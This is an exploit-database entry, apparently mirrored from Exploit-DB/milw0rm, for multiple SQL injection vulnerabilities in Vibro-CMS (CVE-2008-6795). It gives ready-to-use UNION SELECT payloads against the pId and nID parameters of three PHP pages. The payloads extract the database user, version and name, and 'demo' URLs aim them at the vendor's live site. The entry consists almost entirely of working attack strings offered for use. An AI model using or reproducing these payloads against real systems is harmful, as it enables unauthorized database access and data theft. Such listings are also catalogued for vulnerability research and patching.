Lucene search
StAkeREDB-ID:6978HistoryNov 04, 2008 - 12:00 a.m.
Vibro-CMS - Multiple SQL Injections
2008-11-0400:00:00
StAkeR
www.exploit-db.com
30
AI Score
7.4
Confidence
Low
/*
-------------------------------------------------------
Vibro-CMS Multiple Remote SQL Injection Vulnerabilities
-------------------------------------------------------
Discovered By StAkeR[at]hotmail[dot]it
http://www.niclor.net/prodotti/Vibro-CMS
-------------------------------------------------------
* Remote SQL Injection
* Note: Works Regardless PHP.ini Settings
- view_pagina.php?pId=1 union select null,concat_ws(0x3a,user(),version(),database()),null/*
- view_sub-pagina.php?pId=1 union select 0,concat(database(),0x3a,user()),version(),3/*
- view_news.php?nID=4 union select 0,0,user(),1,2,3,4,database(),6,7,8,version(),0/*
* Demo
- http://www.niclor.net/prodotti/Vibro-CMS/view_pagina.php?pId=1 union select 0,concat_ws(0x3a,user(),version(),database()),0/*
- http://www.niclor.net/prodotti/Vibro-CMS/ view_sub-pagina.php?pId=1 union select 0,concat(database(),0x3a,user()),version(),3/*
- http://www.niclor.net/prodotti/Vibro-CMS/view_news.php?nID=4 union select 0,0,user(),1,2,3,4,database(),6,7,8,version(),0/*
*/
# milw0rm.com [2008-11-04]Related
prion
prion
Sql injection
2009-05-07 17:30:00
cve
cve
CVE-2008-6795
2009-05-07 17:30:04
nvd
nvd
CVE-2008-6795
2009-05-07 17:30:04
exploitdb
exploitdb
Vibro-School-CMS - 'nID' SQL Injection
2008-11-04 00:00:00
cvelist
cvelist
CVE-2008-6795
2009-05-07 17:00:00